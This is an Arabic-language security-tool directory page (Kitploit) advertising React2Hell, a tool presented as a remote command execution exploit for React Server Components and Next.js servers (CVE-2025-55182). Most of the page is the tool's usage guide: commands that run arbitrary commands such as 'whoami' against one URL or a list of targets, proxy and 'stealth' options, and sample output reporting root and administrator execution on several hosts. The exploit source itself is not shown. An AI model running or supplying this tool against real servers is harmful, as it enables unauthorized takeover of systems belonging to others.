Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
React2Hell — [React2Hell] استغلال تنفيذ التعليمات البرمجية عن بُعد (RCE) على خادم Next.js/React — CVE-2025-55182 | Kitploit
أدوات/GitHubGitHub/aggressiveuser/react2hell
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمالفريق الأحمر
GitHubaggressiveuser/react2hell

React2Hell

[React2Hell] استغلال تنفيذ التعليمات البرمجية عن بُعد (RCE) على خادم Next.js/React — CVE-2025-55182

عرض المستودع
3منذ 8 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

🧨 React2Hell — استغلال CVE-2025-55182

🔥 استغلال تنفيذ الأوامر عن بُعد (RCE) لخوادم Next.js / React

root@kitploit:~
█████▄  ▄▄▄▄▄  ▄▄▄   ▄▄▄▄ ▄▄▄▄▄▄ ████▄ ██  ██ ▄▄▄▄▄ ▄▄    ▄▄
██▄▄██▄ ██▄▄  ██▀██ ██▀▀▀   ██    ▄██▀ ██████ ██▄▄  ██    ██
██   ██ ██▄▄▄ ██▀██ ▀████   ██   ███▄▄ ██  ██ ██▄▄▄ ██▄▄▄ ██▄▄▄

 Next.js/React Server RCE Exploit — CVE-2025-55182
   Author: Chetanya Sharma (AggressiveUser)

════════════════════════════════════════════════════════════════════════
usage: new.py [-h] [-u URL] [-l LIST] -c COMMAND [--proxy PROXY] [--proxy-https PROXY_HTTPS]

🚀 نظرة عامة

React2Hell هي أداة استغلال قوية مصممة لاختبار واستغلال CVE-2025-55182، وهي ثغرة حرجة لتنفيذ الأوامر عن بُعد تؤثر على Next.js و React Server Actions.

توجد ثغرة تنفيذ أوامر عن بُعد بدون مصادقة في مكونات خادم React في الإصدارات 19.0.0 و 19.1.0 و 19.1.1 و 19.2.0 بما في ذلك الحزم التالية: react-server-dom-parcel و react-server-dom-turbopack و react-server-dom-webpack. يقوم الكود الضعيف بإلغاء تسلسل الحمولات بشكل غير آمن من طلبات HTTP إلى نقاط نهاية وظائف الخادم.


✨ الميزات

  • 🧨 تنفيذ الأوامر عن بُعد (RCE)
  • 🌐 مسح URL واحد / مجموعة URLs
  • 🧩 تنفيذ أوامر مخصصة
  • 🕵️‍♂️ وضع التخفي مع دعم الوكيل
  • ⚡ سريع وموثوق وسهل الاستخدام

📌 الاستخدام

وضع الهدف الفردي

root@kitploit:~
python exploit.py -u https://target.com -c "whoami"

أهداف متعددة (من ملف)

root@kitploit:~
python exploit.py -l urls.txt -c "whoami"

مع وكيل HTTP (Burp Suite)

root@kitploit:~
python exploit.py -u https://target.com -c "whoami" --proxy 127.0.0.1:8080

مع وكيل HTTPS

root@kitploit:~
python exploit.py -u https://target.com -c "whoami" --proxy-https 127.0.0.1:8080

📁 مثال على urls.txt

root@kitploit:~
http://site1.com
https://site2.com
http://192.168.1.10:3000

🖥️ نموذج الإخراج

root@kitploit:~
PS D:\AggressiveUser_PVT\React2Hell> python.exe .\exploit.py -l .\list.txt -c whoami


█████▄  ▄▄▄▄▄  ▄▄▄   ▄▄▄▄ ▄▄▄▄▄▄ ████▄ ██  ██ ▄▄▄▄▄ ▄▄    ▄▄
██▄▄██▄ ██▄▄  ██▀██ ██▀▀▀   ██    ▄██▀ ██████ ██▄▄  ██    ██
██   ██ ██▄▄▄ ██▀██ ▀████   ██   ███▄▄ ██  ██ ██▄▄▄ ██▄▄▄ ██▄▄▄

 Next.js/React Server RCE Exploit — CVE-2025-55182
   Author: Chetanya Sharma (AggressiveUser)

════════════════════════════════════════════════════════════════════════
[+] Loaded 3 targets
════════════════════════════════════════════════════════════════════════

[→] Target: http://meow.host:3113/
[→] Exec:   whoami
[✓] VULNERABLE — RCE Successful!
------------------------------------------------------------
root
------------------------------------------------------------
────────────────────────────────────────────────────────────────────────

[→] Target: http://evil.lab:2000/
[→] Exec:   whoami
[✗] Not vulnerable — Status: 200
────────────────────────────────────────────────────────────────────────

[→] Target: https://vul.lab:3000/
[→] Exec:   whoami
[✓] VULNERABLE — RCE Successful!
------------------------------------------------------------
win-1fl835ovldc\\administrator
------------------------------------------------------------
────────────────────────────────────────────────────────────────────────
[✓] Scan complete — Vulnerable: 2
PS D:\AggressiveUser_PVT\React2Hell>

⚠️ إخلاء مسؤولية

تم إنشاء هذه الأداة للأغراض التعليمية والبحثية الأمنية فقط. لا تستخدمها على أنظمة دون إذن صريح. أنت مسؤول عن أفعالك.


⭐ ادعم المشروع

إذا ساعدك هذا الاستغلال، فكر في ترك ⭐ على GitHub ❤️


👤 المؤلف

Chetanya Sharma AggressiveUser

مصنوع بـ 🔥 بواسطة شخص يستمتع بتعطيل وإصلاح الأشياء.

تنزيل الأداة